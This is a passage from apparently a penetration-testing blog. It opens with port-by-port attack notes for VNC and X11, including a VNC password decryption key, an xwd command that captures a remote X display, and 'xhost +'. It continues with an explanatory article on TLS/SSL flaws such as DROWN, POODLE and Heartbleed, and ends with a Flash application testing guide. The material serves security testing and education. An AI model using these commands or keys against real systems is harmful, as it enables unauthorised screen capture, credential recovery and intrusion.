  - 5900^ for direct access.5800 for HTTP access.
VNC Brute Force
- Password Attacks
  - Remote
    - Password Guess
      - vncrack
    - Password Crack
      - vncrack
      - Packet Capture
        
        Phosshttp://www.phenoelit.de/phoss
  - Local
    - Registry Locations
      - \HKEY_CURRENT_USER\Software\ORL\WinVNC3
      - \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
    - Decryption Key
      - 0x238210763578887
Exmine Configuration Files
- .vnc
- /etc/vnc/config
- $HOME/.vnc/config
- /etc/sysconfig/vncservers
- /etc/vnc.conf

X11 port 6000^ open

X11 Enumeration
- List open windows
- Authentication Method
  - Xauth
  - Xhost
X11 Exploitation
- xwd
  - xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
- Keystrokes
  - Received
  - Transmitted
- Screenshots
- xhost +
Examine Configuration Files
- /etc/Xn.hosts
- /usr/lib/X11/xdm
  - Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
- /usr/lib/X11/xdm/xsession
- /usr/lib/X11/xdm/xsession-remote
- /usr/lib/X11/xdm/xsession.0
- /usr/lib/X11/xdm/xdm-config
  - DisplayManager*authorize:on

Tor Port 9001, 9030 open

Tor Node Checker
- Ip Pages
- Kewlio.net
nmap NSE script

Jet Direct 9100 open

hijetta

Senin, 11 September 2017

TLS/SSL Vulnerabilities

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), both frequently referred to as "SSL", are cryptographic protocols that provide communications security over a computer network.^[1] Several versions of the protocols find widespread use in applications such as web browsing, email, Internet faxing, instant messaging, and voice-over-IP (VoIP). Websites are able to use TLS to secure all communications between their servers and web browsers.

Vulnerabilities

DROWN

CVE-2016-0800, or Decrypting RSA with Obsolete and Weakened eNcryption (DROWN), is a vulnerability that affects servers still supporting SSLv2 or servers that share a private key with any other server that allows SSLv2 (even for other protocols such as email). It allows an attacker who has an effective man-in-the-middle to break the encryption of a TLS connection in under eight hours with a variant being achievable in one minute. The attack takes many hundreds of requests which can be achieved by the user visiting a load intensive application or alternatively being coerced in to visiting a site which can make a large number of cross-site requests. The target application can use any protocol suite including TLSv1.2 as long as the requirement for SSLv2 is also met, additionally RSA key exchange must be used. This issue can be combined with CVE-2015-3197 which is an OpenSSL vulnerability that allows SSLv2 connections to be made even in no SSLv2 ciphers are enabled.

References
https://drownattack.com/
https://drownattack.com/drown-attack-paper.pdf

CRIME

Compression Ratio Info-leak Made Easy (CRIME) is an attack against TLS/SSL, but it has a much smaller probability of exploitation. The authors of CRIME also wrote the BEAST attack. The attacker requires a man-in-the-middle connection and the ability to repeatedly inject predictable data whilst monitoring the resulting encrypted traffic. This could be achievable through Cross-site scripting attacks; JavaScript is not required and an attack could be possible with HTML Injection alone however it would be less efficient.
For CRIME to be possible the client and server must support compression of the request before encryption. TLS supports DEFLATE which is vulnerable, as is SPDY.

BEAST

Browser Exploit Against SSL/TLS (BEAST) is a practical attack was found to be possible against TLS v1.0 and SSLv3.0 (and below) when a block cipher is in use. Effectively an attacker is able to determine the Initialisation Vector utilised as part of the encryption process meaning that if a repeating pattern is evident in the plaintext then it will be evident in the ciphertext. However, it is of limited use an it is only possible to retrieve small pieces of data, such as session tokens. The attacker must be able to man-in-the-middle a connection and there must be a way of generating additional traffic such as an SOP bypass or a Cross-site Scripting vulnerability. The user must be using an older web browser, as modern browsers protect against this issue. If all of these conditions are met and session tokens are protected against XSS through a mechanisms such as HttpOnly cookies then an attacker may exploit BEAST to gain access to these protected tokens.

Remediation
Enforce TLS v1.1 and above
Alternatively you could accept the risk and rely on the protections offered by modern browsers, or alternatively prefer RC4 ciphers to mitigate beast but introduce their own issues.
References
https://www.gracefulsecurity.com/what-is-beast/

BREACH

CVE-2013-3587, or Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) is an instance of CRIME against HTTP Compression. That is to say that CRIME attacked TLS SPDY whereas BREACH targets HTTP gzip/DEFLATE. Therefore turning off the TLS compression has no affect on BREACH as it exploits the underlying HTTP compression. The attack follows the basic steps of the CRIME attack and there are several methods to remediate the issue, such as disabling HTTP compression, protecting the application from CSRF attacks, randomising CSRF tokens per request to prevent them being captured, obfuscating the length of page responses by adding random amounts of arbitrary bytes to the response.
References
https://bugzilla.redhat.com/show_bug.cgi?id=995168

FREAK

CVE-2015-0204, CVE-2015-1637, CVE-2015-1067, or Factoring RSA Keys (FREAK), is a vulnerability that allows an positioned attacker with a man-in-the-middle attack to reduce the security offered by SSL/TLS by forcing a connection to use “Export-grade” grade encryption – which reduces the RSA strength to 512 bits, which is breakable by attackers with a modest budget (In 2015 researchers showed this to be about $104 on Amazon EC2 instances). However breaking keys is still computationally expensive and slow, however an attacker may not require to break a key for every session due to implementation details – for example with Apache mod_ssl a single key was generated at boot time and used for all connections. Export-grade refers to US law which restricted the use of strong cryptography.

References
https://blog.cryptographyengineering.com/2015/03/03/attack-of-week-freak-or-factoring-nsa/

Logjam

CVE-2015-4000, or “Logjam”, is a vulnerability which affects TLSv1.2 and below which allows a man-in-the-middle attacker to downgrade the encryption to 512-bit export grade cryptography, which is breakable by attackers with a modest budget (In 2015 researchers showed this to be about $104 on Amazon EC2 instances).
References
https://weakdh.org/
https://weakdh.org/imperfect-forward-secrecy-ccs15.pdf

NOMORE

Numerous Occurrence MOnitoring & Recovery Exploit, or “RC4 NOMORE”, is a practical attack against RC4 which allows a HTTP Cookie to be retreived within 52 hours, given an effective man-in-the-middle attack. The developers of the NOMORE attack also noted there were several optimisations that could be made to their work to further reduce this time.
References
https://www.rc4nomore.com/

Bar Mitzvah

CVE-2015-2808, or “Bar Mitzvah”, relates to a vulnerability known as the Invariance Weakness which allows for small amounts of plaintext data to be recovered from an SSL/TLS session protected using the RC4 cipher.The attack was described at Blackhat Asia 2015. It requires a positioned attacker with a man-in-the-middle attack capable of capturing “many millions” of requests. This vulnerability allows a positioned attacker to recover the least significant bit of as many as 100 bytes from the encrypted stream.
References
https://www.blackhat.com/docs/asia-15/materials/asia-15-Mantin-Bar-Mitzvah-Attack-Breaking-SSL-With-13-Year-Old-RC4-Weakness-wp.pdf

SWEET32

CVE-2016-2183, or “SWEET32”, relates to a birthday attack against 64-bit block ciphers such as DES and 3DES. It requires a positioned attacker with a man-in-the-middle attack capable of capturing a long-lived HTTPS connection. The original proof of concept showed that it was possible to recover secure HTTP cookies by capturing around 785 GB of traffic, by generating traffic through malicious JavaScript. Effectively therefore, this vulnerability allows a positioned attacker to bypass the protections offered by the “secure” flag on cookies when used in conjunction with a vulnerability such as a SOP bypass or Cross-site Scripting.

DES-CBC3-SHA

References
https://sweet32.info/
https://www.openssl.org/blog/blog/2016/08/24/sweet32/

SSL POODLE

CVE-2014-3566, SSL Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) is a vulnerability affecting SSLv3 where a block cipher is enabled utilizing the CBC cipher mode. It requires a man-in-the-middle attack and the ability for the attacker to cause the application to send the same data over newly created SSL3.0 connections but allows an attacker to decipher a chosen byte of cipher text in as few as 256 attempts. This vulnerability is an issue in the specification not a specific implementation issue. Additionally if a service prefers TLS over SSLv3 it may be possible to ‘roll back’ the connect if the TLS Fallback SCSV mechanism is not enabled.
References
https://www.imperialviolet.org/2014/10/14/poodle.html

Any SSLv3 block cipher with CBC

TLS POODLE

CVE-2014-8730, TLS Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) is a vulnerability affecting certain implementations of TLS. Originally the attack was described against SSLv3 although later expanded with certain limitations. This vulnerability is implementation specific, but known to affect F5 products.
References
https://www.imperialviolet.org/2014/12/08/poodleagain.html
https://support.f5.com/csp/#/article/K15882

Heartbleed
CVE-2014-0160, or “Heartbleed”, is not an issue in SSL/TLs specifically, but instead was an implementation issue in OpenSSL affecting versions 1.0.1 through 1.0.1f. It can be fixed either through upgrading to a more recent version of OpenSSL or alternatively compiling with the option -DOPENSSL_NO_HEARTBEATS. It does not require a Man-in-the-Middle to exploit and can be exploited against both the server and the client. The issue allows an attacker to extract up to 64kb of memory from the vulnerable system, which can lead to the theft of credentials, session tokens and server private keys.
References
http://heartbleed.com/

Cipher Suites

RC2
RC2 ciphers are considered to offer only a low amount of security as their key length. Low strength ciphers are considered to be those with a key length <= 64-bits.

EXP-RC2-CBC-MD5

RC4
RC4 ciphers are known to be vulnerable to a number of issues such as the “Invariance Weakness” first described in 2001. Several attacks have been discussed, such as the “Bar Mitzvah attack” demonstrated at Blackhat Asia 2015. This algorithm is also referred to as ARC4 or ARCFOUR (for Alleged RC4) in some contexts due to the term RC4 being trademarked. The most notable attack is likely the RC4 NOMORE attack which can recover a TLS protected HTTP cookie in as little as 52 hours.

ECDHE-RSA-RC4-SHA, ECDHE-ECDSA-RC4-SHA, AECDH-RC4-SHA, ADH-RC4-MD5, ECDH-RSA-RC4-SHA, ECDH-ECDSA-RC4-SHA, PSK-RC4-SHA, KRB5-RC4-SHA, KRB5-RC4-MD5, ECDHE-RSA-RC4-SHA, ECDHE-ECDSA-RC4-SHA, AECDH-RC4-SHA, ADH-RC4-MD5, ECDH-RSA-RC4-SHA, ECDH-ECDSA-RC4-SHA, PSK-RC4-SHA, KRB5-RC4-SHA, KRB5-RC4-MD5, ECDHE-RSA-RC4-SHA, ECDHE-ECDSA-RC4-SHA, AECDH-RC4-SHA, ADH-RC4-MD5, ECDH-RSA-RC4-SHA, ECDH-ECDSA-RC4-SHA, PSK-RC4-SHA, KRB5-RC4-SHA, KRB5-RC4-MD5, ECDHE-RSA-RC4-SHA, ECDHE-ECDSA-RC4-SHA, AECDH-RC4-SHA, ADH-RC4-MD5, ECDH-RSA-RC4-SHA, ECDH-ECDSA-RC4-SHA, PSK-RC4-SHA, KRB5-RC4-SHA, KRB5-RC4-MD5, EXP-RC4-MD5, RC4-64-MD5, RC4-MD5, RC4-SHA

DES
DES is a 64-bit block cipher and is therefore affected by the “SWEET32” vulnerability described in CVE-2016-2183.
Additionally it is marked as a “Medium” strength cipher which is below the recommended level. Medium strength ciphers are those with a key length at least 56 bits and less than 112 bits.

ECDHE-RSA-DES-CBC3-SHA, ECDHE-ECDSA-DES-CBC3-SHA, EDH-RSA-DES-CBC3-SHA, EDH-DSS-DES-CBC3-SHA, DH-RSA-DES-CBC3-SHA, DH-DSS-DES-CBC3-SHA, AECDH-DES-CBC3-SHA, ADH-DES-CBC3-SHA, ECDH-RSA-DES-CBC3-SHA, ECDH-ECDSA-DES-CBC3-SHA, KRB5-DES-CBC3-SHA, KRB5-DES-CBC3-MD5, ECDHE-RSA-DES-CBC3-SHA, ECDHE-ECDSA-DES-CBC3-SHA, EDH-RSA-DES-CBC3-SHA, EDH-DSS-DES-CBC3-SHA, DH-RSA-DES-CBC3-SHA, DH-DSS-DES-CBC3-SHA, AECDH-DES-CBC3-SHA, ADH-DES-CBC3-SHA, ECDH-RSA-DES-CBC3-SHA, ECDH-ECDSA-DES-CBC3-SHA, KRB5-DES-CBC3-SHA, KRB5-DES-CBC3-MD5, ECDHE-RSA-DES-CBC3-SHA, ECDHE-ECDSA-DES-CBC3-SHA, EDH-RSA-DES-CBC3-SHA, EDH-DSS-DES-CBC3-SHA, DH-RSA-DES-CBC3-SHA, DH-DSS-DES-CBC3-SHA, AECDH-DES-CBC3-SHA, ADH-DES-CBC3-SHA, ECDH-RSA-DES-CBC3-SHA, ECDH-ECDSA-DES-CBC3-SHA, KRB5-DES-CBC3-SHA, KRB5-DES-CBC3-MD5, ECDHE-RSA-DES-CBC3-SHA, ECDHE-ECDSA-DES-CBC3-SHA, EDH-RSA-DES-CBC3-SHA, EDH-DSS-DES-CBC3-SHA, DH-RSA-DES-CBC3-SHA, DH-DSS-DES-CBC3-SHA, AECDH-DES-CBC3-SHA, ADH-DES-CBC3-SHA, ECDH-RSA-DES-CBC3-SHA, ECDH-ECDSA-DES-CBC3-SHA, KRB5-DES-CBC3-SHA, KRB5-DES-CBC3-MD5

3DES
3DES uses a 64-bit block cipher and is therefore affected by the “SWEET32” vulnerability described in CVE-2016-2183.

PSK-3DES-EDE-CBC-SHA, PSK-3DES-EDE-CBC-SHA, PSK-3DES-EDE-CBC-SHA, PSK-3DES-EDE-CBC-SHA

NULL
The NULL cipher suites simply inform the browser not to encrypt data, therefore effectively nullifying any protection given through the use of SSL/TLS.

ECDHE-RSA-NULL-SHA, ECDHE-ECDSA-NULL-SHA, AECDH-NULL-SHA, ECDH-RSA-NULL-SHA, ECDH-ECDSA-NULL-SHA, NULL-SHA256, NULL-SHA, NULL-MD5, ECDHE-RSA-NULL-SHA, ECDHE-ECDSA-NULL-SHA, AECDH-NULL-SHA, ECDH-RSA-NULL-SHA, ECDH-ECDSA-NULL-SHA, NULL-SHA256, NULL-SHA, NULL-MD5, ECDHE-RSA-NULL-SHA, ECDHE-ECDSA-NULL-SHA, AECDH-NULL-SHA, ECDH-RSA-NULL-SHA, ECDH-ECDSA-NULL-SHA, NULL-SHA256, NULL-SHA, NULL-MD5, ECDHE-RSA-NULL-SHA, ECDHE-ECDSA-NULL-SHA, AECDH-NULL-SHA, ECDH-RSA-NULL-SHA, ECDH-ECDSA-NULL-SHA, NULL-SHA256, NULL-SHA, NULL-MD5, RSA-NULL-SHA256

Hashing

SHA-1
Both Microsoft and Google have announced that it is inappropriate to use. Microsoft, when speaking about SSL/TLS for HTTPS noted back in 2013 that they will no longer be supporting SHA1 as a security algorithm past 2016. Google had a similar announcement stating they will be penalising companies for using SHA1 during 2016 and no longer supporting it post-2016 – that announcement and a little further information is available here: https://security.googleblog.com/2014/09/gradually-sunsetting-sha-1.html. Microsoft also published the following article which shows movement towards deprecation in Internet Explorer and Edge: https://blogs.windows.com/msedgedev/2016/11/18/countdown-to-sha-1-deprecation/#Jeb54DCIEtIIcY4r.97
References
https://blogs.windows.com/msedgedev/2016/11/18/countdown-to-sha-1-deprecation/#Jeb54DCIEtIIcY4r.97

https://security.googleblog.com/2014/09/gradually-sunsetting-sha-1.html

Certificate Issues

Self-Signed Certificates are those which have not been signed by a recognized certificate authority. These effectively nullify the protections offered by SSL/TLS as an attacker can simply create their own “forged” certificate and the end user would have no way of knowing that the certificate was no the one that should be expected – therefore allowing a positioned attacker to establish a man-in-the-middle attack to capture all encrypted data and to modify both client requests and server responses. This is different to a certificate which is signed by an unrecognized Certificate Authority (CA) as the attacker would not be able to forge these certificates specifically although the client may have the Certificate Authority as trusted within their local store; this situation is often found on internal corporate networks where the company have implemented their own CA.

Certificate with Wrong Hostname

If the Common Name does not match the hostname of the server then a user may not be able to determine if the certificate is for that service or not, this generally results in a security error within web browsers and requires the user to “click through” the message to view the application. This would also prevent a user from visiting the application if HSTS is enabled. This would likely require some degree of social engineering to be useful to an attacker attempting to man-in-the-middle a connection, however users may be used to clicking through the error message when visiting this service and therefore not notice the illegitimate certificate.

https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/

Flash Applications Penetration Testing

Adobe Flash (formerly Macromedia Flash) is a multimedia platform originally acquired by Macromedia and currently developed and distributed by Adobe Systems. Since its introduction in 1996, Flash has become a popular method for adding animation and interactivity to web pages. Flash is commonly used to create animation, advertisements, and various web page Flash components, to integrate video into web pages, and more recently, to develop rich Internet applications. Source: en.wikipedia.org/wiki/Adobe_Flash Conventionally, RIA developed with Adobe Flash technology consists of a frontend application compiled as an SWF/AIR object to be executed by the Flash Plugin inside the User’s Browser or the AIR Platform installed on the User’s System. This interactive application provides a user Interface to the end-user and in turn communicates with a backend server for its business logic over protocols like HTTP/AMF, HTTP/SOAP, HTTP/REST etc.

Similar to any widely used web application and software, a RIA can also be a victim of most common and dangerous security Issues. For example, since most Flash based RIAs are backed by an application for its business logic which in turn uses a database, a Flash based RIA might also be vulnerable to common application vulnerabilities like SQL Injection if user input is not sanitized properly. Quite logical huh?. Attackers can also utilize Flash to execute mass exploitation, for example backdoors or malware entirely written in Flash/ActionScript or BOFs against player/plugin or browser.

It is quite general to deduce that security flaws may also be present in the core environment (which includes the OS and web browsers) that can be exploited regardless of the applications (including Flash Player) running in that environment. A recent paper from Adobe suggests that the approach of Adobe is to implement robust security within its own products while “doing no harm” to the rest of the environment (in other words, to introduce no exposures to the rest of the environment, nor allow any avenues for additional exploitation of any existing platform security weaknesses).

This provides a consistently high level of security for what Flash applications can do (as managed within Flash Player), regardless of the platform. Because Adobe products are also designed to be backwards-compatible when possible, some environments may be more vulnerable to weaknesses in the browser or operating system, or have weaker cryptography capabilities. Ultimately, users are responsible for their choices of platforms and maintenance of appropriate operational environments.

Vulnerabilities in flash RIA can be broadly classified under two categories: client side vulnerabilities and server side vulnerabilities. Let’s review each one of these very quickly:

Client Side Vulnerabilities

Amongst the various vulnerabilities that might affect a Flash Application on the client side, some of the most common ones are:

Flash parameter Injection: It might be possible for an attacker can inject global Flash parameters when the movie is embedded in a parent HTML page. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. There is nice detailed paper by the IBM Rational guys on this vulnerability. You can download it here.

Cross Domain Privilege Escalation: Cross Domain inter-mixing of content and data is done based on access policy defined in crossdomain.xml of the serving domain for the SWF object. If the access policy is too open, then under certain circumstances, it might be possible for an attacker to supersede the original SWF object with his own malicious version or access the DOM of the hosting domain.

Cross Site Scripting: Depending on access policy, a Flash SWF can access its host DOM for various functional use cases. A Flash SWF can in turn modify the DOM of its host and if it does so based on un-sanitized user input, it might be possible to perform a conventional XSS attack on the host DOM.

Cross Site Flashing: Cross Site Flash (XSF) occurs when an SWF objects loads another SWF Object. This attack could result in XSS or in the modification of the GUI in order to fool a user to insert credentials on a fake flash form. XSF could be used in the presence of Flash HTML Injection or external SWF files when loadMovie methods are used. OWASP has a testing guide for XSF. Although not comprehensive, still it is a very good point to start. Read it here.

Server Side Vulnerabilities

Flash Applications seldom makes remote calls to a backend server for various operations like looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. Flash Applications built with Adobe Flex SDK usually use AMF Objects exchanged over HTTP Protocol as a method of communication.
AMF Remoting calls are essentially RPC like calls where the Flash Application is calling a given method defined on the server on a specific AMF Endpoint. An attacker can intercept and tamper the AMF data to compromise the server.

In most of the cases the application server responsible for providing Business Logic to a Flash RIA frontend is a standard web application and can be affected by the very same vulnerabilities as any other web application like as described by the WASC Threat Classification Project.

Testing Flash Applications: Objectives and Approach

A Flash Security Testing exercise for a Flash Based RIA is conducted with the following objectives:

Identify the application entry points and test for possible vulnerabilities in the SWF Object itself.
Identify the remote server with which the application might communicate for its business logic requirements.
Identify the protocol with which the SWF Object is communicating with its back-end server. In most of the cases, the protocol will either be SOAP/REST or AMF.
Identify and enumerate all the functionalities exposed by the back-end application.
Penetration Testing of the individual functionalities exposed by the back-end application for standard application security vulnerabilities.

Client Side Testing

Client side primarily relates to static analysis of the flash application. The idea of static analysis of a Flash SWF Object is to decompile the SWF file and attempt to do a white box testing approach by looking into the source code of the Flash SWF File. Basic approach to test client side vulnerabilities is :

Decompile SWF files into source code (ActionScript) and statically analyzes it to identify security issues such as information disclosure (hard coded).
Audit third party applications without requiring access to the source code.
Common vulnerabilities includes hard coded login credentials, internal IP disclosure, etc.
Apart from analyzing the SWF file, it is also important to analyze the code responsible for generating the HTML file that embeds the SWF object. Under certain circumstances in might be possible to manipulate the FlashVars variable through which SWF inputs can be influenced.

There are however automated tools like HP SWFScan available to do this job upto a certain degree.

Server Side Testing

The best straightforward way to do a server side testing for flash based RIA applications are as follows:

1. Extract Gateway

Load the flash e.g http://foo.com/bar.swf in a browser with service capture/burp proxy/charlesproxy running .
Decompile the SWF using swfdump and grep the gateway patterns. Also get a list of all the urls in SWFdump.

2. Enumerate service/methods

Try amfphp.DiscoveryService on all gateways using Pinta.
Use Pinta for AMF calling even if the services and methods are manually entered and hence can be helpful in testing remote methods.

If it fails try extracting them using regex from SWFDump using the following regular expression.
Services:

–"\"([a-zA-Z0-9_]*)\"“ with filter as “service” (conventional)

–"destination id=\"([\\w\\d]*)\"“

3. Make AMF calls

Use Pinta to call remote methods using different test parameters.
Single quote (SQL injection), neighbor parameters (Direct Object Reference).

Testing the backend application once the exposed functionalities are enumerated should be more or less conventional to standard web application security testing methodology just that a different protocol (AMF serialized calls in this case) is used for interacting with the server and invoking the functionalities.

Checklist of Vulnerabilities to be tested

Cross Site Scripting
Malicious Data Injection
Insufficient Authorization Restrictions
Secure Transmission
SWF Information Leak
Minimum Stage Size for Anti-ClickJacking
SWF Control Permission
Untrusted SWF in Same Domain
Clickjacking
Privilege Seperation
Cross Domain Policy Audit
Uninitialized Variable Scanning
Remote Method Enumeration
Business Logic Testing

This is a brief guide to testing flash applications. Comments are welcome to make it better and more comprehensive. At the end, we intend to publish a freely available whitepaper to pen testers for testing flash based RIA. Additional sections included in the paper will also carry due credits as received in the comments section below.

http://gcattani.github.io/201303/flash-testing-for-dummies